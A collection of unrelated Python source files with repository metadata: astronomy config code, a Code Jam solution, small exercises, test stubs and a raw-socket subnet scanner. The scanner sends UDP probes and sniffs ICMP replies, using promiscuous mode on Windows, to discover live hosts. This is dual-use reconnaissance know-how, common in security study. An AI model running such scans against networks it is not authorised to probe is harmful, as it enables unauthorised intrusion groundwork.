'description': "Refit if number of fitted components is not compatible with neighbors. [True/False]",
'simple': True}),
('p_limit', {
'default': '0.02',
'description': "Probability threshold given in percent for features of consecutive positive or negative channels to be counted as more likely to be a noise feature [float]",
'simple': False}),
('signal_mask', {
'default': 'True',
'description': "Constrict goodness-of-fit calculations to spectral regions estimated to contain signal [True/False]",
'simple': False}),
('pad_channels', {
'default': '5',
'description': "Number of channels by which an interval (low, upp) gets extended on both sides, resulting in (low - pad_channels, upp + pad_channels). [int]",
'simple': False}),
('min_channels', {
'default': '100',
'description': "Required minimum number of spectral channels that the signal ranges should contain. [int]",
'simple': False}),
('mask_out_ranges', {
'default': '[]',
'description': "Mask out ranges in the spectrum; specified as a list of tuples [(low1, upp1), ..., (lowN, uppN)]",
'simple': False}),
('random_seed', {
'default': '111',
'description': "Seed for random processes [int]",
'simple': True}),
('main_beam_efficiency', {
'default': 'None',
'description': "Specify if intensity values should be corrected by the main beam efficiency given in percent. [float]",
'simple': False}),
('vel_unit', {
'default': 'u.km / u.s',
'description': "Unit to which velocity values will be converted. [astropy.units]",
'simple': True}),
('testing', {
'default': 'False',
'description': "Testing mode; only decomposes a single spectrum. [True/False]",
'simple': False})
]
dct_default = collections.OrderedDict(default)
training = [
('n_spectra', {
'default': '100',
'description': "Number of spectra contained in the training set [int]",
'simple': True}),
('order', {
'default': '6',
'description': "Minimum number of spectral channels a peak has to contain on either side [int]",
'simple': True}),
('rchi2_limit', {
'default': '1.5',
'description': "maximium value of reduced chi-squared for decomposition result [float]",
'simple': True}),
('use_all', {
'default': 'False',
'description': "Use all spectra in FITS cube as training set [True/False]",
'simple': False}),
('params_from_data', {
'default': 'True',
'description': " [True/False]",
'simple': False}),
('alpha1_initial', {
'default': 'None',
'description': " [float]",
'simple': False}),
('alpha2_initial', {
'default': 'None',
'description': " [float]",
'simple': False}),
('snr_thresh', {
'default': 'None',
'description': " [float]",
'simple': False}),
('snr2_thresh', {
'default': 'None',
'description': " [float]",
'simple': False})
]
dct_training = collections.OrderedDict(training)
preparation = [
('n_spectra_rms', {
'default': '1000',
'description': "Number of spectra used to estimate average root-mean-square noise [int]",
'simple': False}),
('gausspy_pickle', {
'default': 'True',
'description': "Save the prepared FITS cube as pickle file [bool]",
'simple': False}),
('data_location', {
'default': 'None',
'description': "Only used for 'testing = True'; specify location of spectrum used for test decomposition as (y, x) [tuple]",
'simple': False}),
('simulation', {
'default': 'False',
'description': "Set to 'True' if FITS cube contains simulation data without noise [bool]",
'simple': False}),
('rms_from_data', {
'default': 'True',
'description': "Calculate the root-mean-square noise from the data [bool]",
'simple': True}),
('average_rms', {
'default': 'None',
'description': "Average data of the FITS cube; if no value is supplied it is estimated from the data [float]",
'simple': True})
]
dct_preparation = collections.OrderedDict(preparation)
decomposition = [
# ('gausspy_decomposition', {
# 'default': 'True',
# 'description': " [bool]",
# 'simple': False}),
('save_initial_guesses', {
'default': 'False',
'description': "Save initial component guesses of GaussPy as pickle file [bool]",
'simple': False}),
('alpha1', {
'default': 'None',
'description': "First smoothing parameter [float]",
'simple': True}),
('alpha2', {
'default': 'None',
'description': "Second smoothing parameter (only used if 'two_phase_decomposition = True') [float]",
'simple': True}),
('snr_thresh', {
'default': 'None',
'description': "Signal-to-noise threshold used in GaussPy decomposition for original spectrum. Defaults to 'snr' if not specified. [float]",
'simple': False}),
('snr2_thresh', {
'default': 'None',
'description': "Signal-to-noise threshold used in GaussPy decomposition for second derivative of spectrum. Defaults to 'snr' if not specified. [float]",
'simple': False}),
('improve_fitting', {
'default': 'True',
'description': "Use the improved fitting routine. [bool]",
'simple': False}),
('exclude_means_outside_channel_range', {
'default': 'True',
'description': "Exclude Gaussian fit components if their mean position is outside the channel range. [bool]",
'simple': False}),
('snr_fit', {
'default': 'None',
'description': "Required minimum signal-to-noise value for fitted components. Defaults to 'snr/2' if not specified. [float]",
'simple': False}),
('snr_negative', {
'default': 'None',
'description': "Required minimum signal-to-noise value for negative data peaks. Used in the search for negative residual peaks. Defaults to 'snr' if not specified. [float]",
'simple': False}),
('max_amp_factor', {
'default': '1.1',
'description': "Factor by which the maximum data value is multiplied to get a maximum limit for the fitted amplitudes. [float]",
'simple': False})
]
dct_decomposition = collections.OrderedDict(decomposition)
spatial_fitting = [
# , {
# 'default': ,
# 'description': " []",
# 'simple': False},
('exclude_flagged', {
'default': 'False',
'description': "Exclude all flagged spectra as possible refit solutions. [bool]",
'simple': False}),
('rchi2_limit', {
'default': None,
'description': "maximium value for the reduced chi-squared above which the fit gets flagged [float]",
'simple': False}),
('rchi2_limit_refit', {
'default': 'None',
'description': "Defaults to 'rchi2_limit' if not specified. [float]",
'simple': False}),
('max_diff_comps', {
'default': '1',
'description': "Maximum allowed difference in the number of fitted components compared to weighted median of immediate neighbors [int]",
'simple': True}),
('max_jump_comps', {
'default': '2',
'description': "Maximum allowed difference in the number of fitted components between individual neighboring spectra [int]",
'simple': True}),
('n_max_jump_comps', {
'default': '1',
'description': "Maximum number of allowed 'max_jump_comps' occurrences for a single spectrum. [int]",
'simple': True}),
('max_refitting_iteration', {
'default': '30',
'description': "Maximum number for refitting iterations. [int]",
'simple': False}),
('flag_blended', {
'default': 'True',
'description': "Flag spectra with blended fit components. [bool]",
'simple': False}),
('flag_neg_res_peak', {
'default': 'True',
'description': "Flag spectra with negative residual features. [bool]",
'simple': False}),
('flag_rchi2', {
'default': 'False',
'description': "Flag spectra with high reduced chi-square values. [bool]",
'simple': False}),
('flag_residual', {
'default': 'True',
'description': "Flag spectra with non-Gaussian distributed residuals. [bool]",
'simple': False}),
('flag_broad', {
'default': 'True',
'description': "Flag spectra with broad fit components. [bool]",
'simple': False}),
('flag_ncomps', {
'default': 'True',
'description': "Flag spectra with number of fit components incompatible with neighbors. [bool]",
'simple': False}),
('mean_separation', {
'default': '2.',
'description': "Maximum difference in offset positions of fit components for grouping. [float]",
'simple': True}),
('fwhm_separation', {
'default': '4.',
'description': "Maximum difference in FWHM values of fit components for grouping. [float]",
'simple': True}),
('fwhm_factor_refit', {
'default': 'None',
'description': "Defaults to 'fwhm_factor' if not specified. [float]",
'simple': False}),
('broad_neighbor_fraction', {
'default': '0.5',
'description': "Spectra get flagged as containing broad components if the FWHM value of one of their fit components exceeds the FWHM values of all fit components for this fraction of neighbors [float]",
'simple': False}),
('min_weight', {
'default': '0.5',
'description': "Minimum weight threshold for phase 2 of spatially coherent refitting. [float]",
'simple': True}),
('weight_factor', {
'default': '2',
'description': "Factor that determines the weight given to neighboring spectra located at a distance of 1 and 2 pixels. [int/float]",
'simple': False}),
('only_print_flags', {
'default': 'False',
'description': "Only print flags in terminal without refitting. [bool]",
'simple': False})
]
dct_spatial_fitting = collections.OrderedDict(spatial_fitting)
config_file = []
config_file.append('[DEFAULT]')
config_file = append_keywords(config_file, dct_default,
all_keywords=all_keywords,
description=description)
config_file.append('\n\n[training]')
config_file = append_keywords(config_file, dct_training,
all_keywords=all_keywords,
description=description)
config_file.append('\n\n[preparation]')
config_file = append_keywords(config_file, dct_preparation,
all_keywords=all_keywords,
description=description)
config_file.append('\n\n[decomposition]')
config_file = append_keywords(config_file, dct_decomposition,
all_keywords=all_keywords,
description=description)
config_file.append('\n\n[spatial fitting]')
config_file = append_keywords(config_file, dct_spatial_fitting,
all_keywords=all_keywords,
description=description)
if not output_directory:
output_directory = os.getcwd()
with open(os.path.join(output_directory, filename), 'w') as file:
for line in config_file:
file.write(line)
save_file(filename, output_directory)
def get_values_from_config_file(self, config_file, config_key='DEFAULT'):
    """Read in values from a GaussPy+ configuration file.

    Each key of the chosen section is parsed with `ast.literal_eval` and
    set as an attribute on `self`; 'vel_unit' values that are not literals
    are converted to an astropy unit instead.

    Parameters
    ----------
    config_file : str
        Filepath to configuration file of GaussPy+.
    config_key : str
        Section of GaussPy+ configuration file, whose parameters should be read in addition to 'DEFAULT'.
    """
    config = configparser.ConfigParser()
    config.read(config_file)
    for key, value in config[config_key].items():
        try:
            setattr(self, key, ast.literal_eval(value))
        # literal_eval signals non-literal values with ValueError but can
        # also raise SyntaxError on malformed input (previously uncaught).
        except (ValueError, SyntaxError) as err:
            if key == 'vel_unit':
                value = u.Unit(value)
                setattr(self, key, value)
            else:
                # Chain the original error so the root cause stays visible.
                raise Exception(
                    'Could not parse parameter {} from config file'.format(key)
                ) from err
| [
"riener@mpia.de"
] | riener@mpia.de |
f0ded2b48bdd2dcc0964e1b543f2a49c1904ea15 | d223ac1fd284026ac91d02f35e89b7931e65e860 | /Passive/basic_scanner.py | 295258a0b3194aa67240f08001984d1a71356771 | [] | no_license | k-cross/netseries | 6a877e9541ba40aa2da0f0b451c78fb4e716c21a | 4df2b1815e6dba19c12d139694d7f05ca687a31a | refs/heads/master | 2021-01-17T19:11:02.941587 | 2016-08-18T22:38:19 | 2016-08-18T22:38:19 | 64,818,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,952 | py | import sys
import socket
import os
import struct
import time
import threading
from netaddr import IPNetwork, IPAddress
from ctypes import *
class IP(Structure):
    """ctypes view of an IPv4 header (fixed 20-byte part, options ignored).

    Instances are created straight from a raw packet buffer: __new__
    overlays the structure onto the first sizeof(IP) bytes and __init__
    then derives human-readable attributes from the raw fields.
    """
    _fields_ = [
        ('ihl', c_ubyte, 4),
        ('version', c_ubyte, 4),
        ('tos', c_ubyte),
        ('len', c_ushort),
        ('id', c_ushort),
        ('offset', c_ushort),
        ('ttl', c_ubyte),
        ('protocol_num', c_ubyte),
        ('sum', c_ushort),
        ('src', c_uint32),
        ('dst', c_uint32)
    ]
    def __new__(cls, socket_buffer=None):
        # Copy the structure out of the first sizeof(IP) bytes of the buffer.
        return cls.from_buffer_copy(socket_buffer)
    def __init__(self, socket_buffer=None):
        # Map protocol constants to their names
        self.protocol_map = {1: 'ICMP', 6: 'TCP', 17: 'UDP'}
        # Human readable IP addresses ('@I' keeps native byte order,
        # matching how c_uint32 read the field above)
        self.src_address = socket.inet_ntoa(struct.pack('@I', self.src))
        self.dst_address = socket.inet_ntoa(struct.pack('@I', self.dst))
        # Human readable protocol; fall back to the numeric value for
        # protocols not in the map.  Was a bare `except:`, which also
        # swallowed KeyboardInterrupt/SystemExit.
        try:
            self.protocol = self.protocol_map[self.protocol_num]
        except KeyError:
            self.protocol = str(self.protocol_num)
class ICMP(Structure):
    """ctypes view of an ICMP header: type/code/checksum plus the two
    16-bit words carried by destination-unreachable messages."""
    _fields_ = [
        ('type', c_ubyte),
        ('code', c_ubyte),
        ('checksum', c_ushort),
        ('unused', c_ushort),
        ('next_hop_mtu', c_ushort)
    ]
    def __new__(cls, socket_buffer):
        # Copy the structure straight out of the raw packet bytes.
        return cls.from_buffer_copy(socket_buffer)
    def __init__(self, socket_buffer):
        # Every field is already filled in by __new__; the no-op override
        # stops Structure's default __init__ from treating the buffer
        # argument as a field initializer.
        pass
def udp_sender(subnet, send_message):
    """Send one UDP datagram to every address in `subnet` on port 65212.

    The probes are expected to provoke ICMP destination-unreachable
    replies, which the sniffer in main() listens for.
    """
    # Give the sniffer in the main thread a head start before probing.
    time.sleep(5)
    sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for ip in IPNetwork(subnet):
        try:
            sender.sendto(send_message.encode('UTF-8'), ('%s' % ip, 65212))
        except OSError:
            # Was a bare `except:`; still ignore per-address send failures
            # (e.g. network/broadcast addresses) but no longer swallow
            # KeyboardInterrupt/SystemExit.
            pass
# Host to listen on
def main():
    """Sniff ICMP replies while UDP probes are sprayed across the subnet
    and print each responding (live) host found inside the subnet."""
    # Host/subnet from argv, with hard-coded defaults for convenience.
    # The original code caught an exception here, printed a message, and
    # then crashed with NameError because host/subnet stayed undefined.
    if len(sys.argv) > 2:
        host = sys.argv[1]
        subnet = sys.argv[2]
    else:
        if len(sys.argv) > 1:
            print('[!] Expected both host and subnet; using defaults')
        host = '192.168.1.119'
        subnet = '192.168.1.0/24'
    send_message = 'Welcome to Earth!'
    # create raw socket and bind to public interface
    if os.name == 'nt':
        socket_protocol = socket.IPPROTO_IP
    else:
        socket_protocol = socket.IPPROTO_ICMP
    print('[*] Starting')
    print(subnet, send_message)
    # Start new thread for sending packets
    t = threading.Thread(target=udp_sender, args=(subnet, send_message))
    t.daemon = False
    t.start()
    try:
        sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
        sniffer.bind((host, 0))
        sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # Includes IP headers in capture
        # If using Windows, send IOCTL to setup promiscuous mode
        if os.name == 'nt':
            sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
        while True:
            # Read in a single packet
            raw_buffer = sniffer.recvfrom(65565)[0]
            # Overlay the IP header structure onto the start of the buffer
            ip_header = IP(raw_buffer)
            if ip_header.protocol == 'ICMP':
                # ICMP payload starts after the IP header (ihl is in 32-bit words)
                offset = ip_header.ihl * 4
                buf = raw_buffer[offset:offset + sizeof(ICMP)]
                icmp_header = ICMP(buf)
                # Type 3 / code 3 == port unreachable: the host answered our probe
                if icmp_header.code == 3 and icmp_header.type == 3:
                    # Checks host is in target subnet
                    if IPAddress(ip_header.src_address) in IPNetwork(subnet):
                        print('Host Up: %s' % ip_header.src_address)
    except KeyboardInterrupt:
        # Turn off promiscuous mode for Windows
        if os.name == 'nt':
            sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
        print('[!] Exiting!')
        sys.exit(1)
if __name__ == '__main__':
    main()
| [
"kenneth.cross@sjsu.edu"
] | kenneth.cross@sjsu.edu |
0cbec1209297db0cea54c9750fda3191b2c81c49 | 9f387c703dbf4d970d0259424c7b299108c369f5 | /dd_sdk_1_0/test/test_pphrase_status.py | d36c5ad98c7760744f7a337d75bf38b94574e36b | [] | no_license | gcezaralmeida/datadomain_sdk_python | c989e6846bae9435c523ab09e230fc12d020f7f1 | e102ec85cea5d888c8329626892347571832e079 | refs/heads/main | 2023-08-23T22:42:47.083754 | 2021-10-25T21:52:49 | 2021-10-25T21:52:49 | 370,805,524 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py | # coding: utf-8
"""
DataDomain Rest API Documentation
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import dd_sdk_1_0
from dd_sdk_1_0.models.pphrase_status import PphraseStatus # noqa: E501
from dd_sdk_1_0.rest import ApiException
class TestPphraseStatus(unittest.TestCase):
    """PphraseStatus unit test stubs"""
    def setUp(self):
        # Generated stub: no fixtures are required.
        pass
    def tearDown(self):
        # Generated stub: nothing to clean up.
        pass
    def testPphraseStatus(self):
        """Test PphraseStatus"""
        # FIXME: construct object with mandatory attributes with example values
        # model = dd_sdk_1_0.models.pphrase_status.PphraseStatus() # noqa: E501
        pass
if __name__ == '__main__':
    unittest.main()
| [
"root@s6006st157.petrobras.biz"
] | root@s6006st157.petrobras.biz |
c26f7da4618ce366665902e5302401eb51b7a7e7 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_168/192.py | 4b1c56e8937197c40bcc14b36ab4a85b81054688 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,510 | py |
# 0:right 1:down 2:left 3:up
DIRECTION = {'>': 0, 'v': 1, '<': 2, '^': 3, }
dx = [1, 0, -1, 0]
dy = [0, 1, 0, -1]
if __name__ == '__main__':
    # Python 2 script (raw_input/xrange/print statement).
    # For each case: count arrows whose ray leaves the grid before hitting
    # another arrow (those need retargeting); the case is IMPOSSIBLE when
    # some arrow is the only non-empty cell in both its row and column.
    T = int(raw_input())
    for t in xrange(1, T + 1):
        R, C = map(int, raw_input().split())
        grid = [raw_input() for _ in xrange(R)]
        count = 0
        for i in xrange(R):
            for j in xrange(C):
                if grid[i][j] == '.':
                    continue
                d = DIRECTION[grid[i][j]]
                y, x = i, j
                # Walk along the arrow's direction until we hit another
                # arrow (fine) or leave the grid (needs one change).
                while True:
                    ny = y + dy[d]
                    nx = x + dx[d]
                    if nx < 0 or nx >= C or ny < 0 or ny >= R:
                        count += 1
                        break
                    if grid[ny][nx] != '.':
                        break
                    y, x = ny, nx
        # Per-row / per-column counts of non-empty cells.
        raw_count = [0] * R
        column_count = [0] * C
        for i in xrange(R):
            for j in xrange(C):
                if grid[i][j] != '.':
                    raw_count[i] += 1
                    column_count[j] += 1
        # An arrow alone in its row and column has nothing to point at.
        f = False
        for i in xrange(R):
            for j in xrange(C):
                if grid[i][j] != '.' and raw_count[i] == 1 and column_count[j] == 1:
                    f = True
                    break
            if f:
                break
        if f:
            print "Case #%d: IMPOSSIBLE" % t
        else:
            print "Case #%d: %d" % (t, count)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
8b09bf53667b6acc11353ed1ff084d9d679bc7d5 | 21ed75ebab9b413f485eac4804af3f867146b316 | /morseCode.py | 0f3fb088caed7806e9900265f7511fe8e8b8db63 | [] | no_license | jamesdeal89/notes | d73b9266bf17f60f3d51bd3c502119d3a915ce04 | c0326c54c9c0045f2296c04c9d4884df7b63f131 | refs/heads/master | 2020-12-12T18:24:56.209396 | 2020-12-10T01:27:05 | 2020-12-10T01:27:05 | 234,198,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,058 | py | # Allows a user to encode text into morse code
#dictionary I stole
MORSE_CODE_DICT = { 'A':'.-', 'B':'-...',
'C':'-.-.', 'D':'-..', 'E':'.',
'F':'..-.', 'G':'--.', 'H':'....',
'I':'..', 'J':'.---', 'K':'-.-',
'L':'.-..', 'M':'--', 'N':'-.',
'O':'---', 'P':'.--.', 'Q':'--.-',
'R':'.-.', 'S':'...', 'T':'-',
'U':'..-', 'V':'...-', 'W':'.--',
'X':'-..-', 'Y':'-.--', 'Z':'--..',
'1':'.----', '2':'..---', '3':'...--',
'4':'....-', '5':'.....', '6':'-....',
'7':'--...', '8':'---..', '9':'----.',
'0':'-----', ', ':'--..--', '.':'.-.-.-',
'?':'..--..', '/':'-..-.', '-':'-....-',
'(':'-.--.', ')':'-.--.-'}
english = input("enter text to be encoded")
morse = ""
for x in english:
if x != " ":
morse += MORSE_CODE_DICT[x]
else:
morse += '|'
print(morse)
| [
"j891319@protonmail.com"
] | j891319@protonmail.com |
3bd1e5e216c3e7be53b982d4c0a73af3ee74e8db | 5bc20150d596e49c2d79cc2348e11da76840f2d0 | /src/About.py | 8093203237e5e1d6fed76d66ea9b8bd7c65304be | [] | no_license | FranzPoize/spoontravel | 10e5309b3325581237a8fa4795ba53150228984e | 50d6f8de9df7018cd095541377ff8b667d91b9a7 | refs/heads/master | 2021-01-16T19:58:18.534235 | 2012-03-03T22:22:07 | 2012-03-03T22:22:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | from BaseHandler import BaseHandler
class About(BaseHandler):
    """Request handler for the static "about" page."""

    def get(self):
        """Render the about template with an empty template context."""
        template_values = {}
        self.render_response('about.html', **template_values)
| [
"maxime@werlen.fr"
] | maxime@werlen.fr |
01c36da9c29dc88c708b32714c93d002770dc4da | e44112c5ffd151972846d46e8f0ec915fd33e59b | /모의고사3_5.py | 028a1b0c35481f882511125154bed650a4d85970 | [] | no_license | ssoomin1/CosPro_Test | b6a97a63f5de75bd95731e7e060677db011f668e | 1d968a5b964c7a1ca6708fc226e5c1997884b909 | refs/heads/main | 2023-04-23T10:10:48.055408 | 2021-05-17T14:59:32 | 2021-05-17T14:59:32 | 368,224,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | #신수민
def solution(mho_cards, mhe_cards):
    """Compare two hands of cards position by position.

    A position is "won" by whichever hand holds the larger card there;
    equal cards count for neither side.

    Generalized from the original hard-coded ``range(13)`` to hands of
    any (equal) length via ``zip`` — behavior on 13-card hands is
    unchanged.

    Args:
        mho_cards: first player's cards.
        mhe_cards: second player's cards.

    Returns:
        1 if mho wins more positions, 0 if mhe wins more, -1 on a tie
        (including empty hands).
    """
    mho_wins = 0
    mhe_wins = 0
    for mho_card, mhe_card in zip(mho_cards, mhe_cards):
        if mho_card > mhe_card:
            mho_wins += 1
        elif mhe_card > mho_card:
            mhe_wins += 1
    if mho_wins > mhe_wins:
        return 1
    if mho_wins < mhe_wins:
        return 0
    return -1
# Sample hands: evaluate one game and print the winner code
# (1 = mho, 0 = mhe, -1 = tie).
mho_cards = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
mhe_cards = [2, 1, 3, 4, 5, 9, 6, 7, 8, 10, 11, 12, 13]
ret = solution(mho_cards, mhe_cards)
print(ret)
"ssoomin1@naver.com"
] | ssoomin1@naver.com |
73fc05ec512bf4748f8e426e062163878f2c6ca7 | 6443dd730175e0f9e2bb672b9b84fafe66fe4b9d | /tests/app_controllers/test_travis_controller.py | edf09543e5da797272ca66310f709b8977c26711 | [] | no_license | cavalrytactics/securethebox-server | 8bde4add92b662ea2c106d14199e34db8883267d | c07e6efae469599a2990e222a89a73159339b807 | refs/heads/master | 2022-12-13T04:00:30.789742 | 2020-04-04T15:47:13 | 2020-04-04T15:47:13 | 239,040,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | from app_controllers.travis_controller import TravisController
import json
import os
import pytest
pytest.globalData = []
c = TravisController()
def loadGlobalData():
with open(str(os.getcwd())+"/tests/globalData.json", "r") as f:
pytest.globalData = json.load(f)
def test_loadGlobalData():
loadGlobalData()
with open(str(os.getcwd())+"/tests/globalData.json", "r") as f:
pytest.globalData = json.load(f)
def test_tarSecretFiles():
loadGlobalData()
c.setCurrentDirectory()
c.setFileName("secrets.tar")
assert c.tarSecretFiles(pytest.globalData["unencryptedFileNames"]) == True
def test_setTravisEncryptFile():
loadGlobalData()
c.setCurrentDirectory()
c.setFileName("secrets.tar")
assert c.setTravisEncryptFile() == True
def test_setTravisUnencryptFile():
loadGlobalData()
c.setCurrentDirectory()
c.setFileName("secrets.tar")
assert c.setTravisUnencryptFile() == True | [
"charleschong@Charless-MacBook-Pro.local"
] | charleschong@Charless-MacBook-Pro.local |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.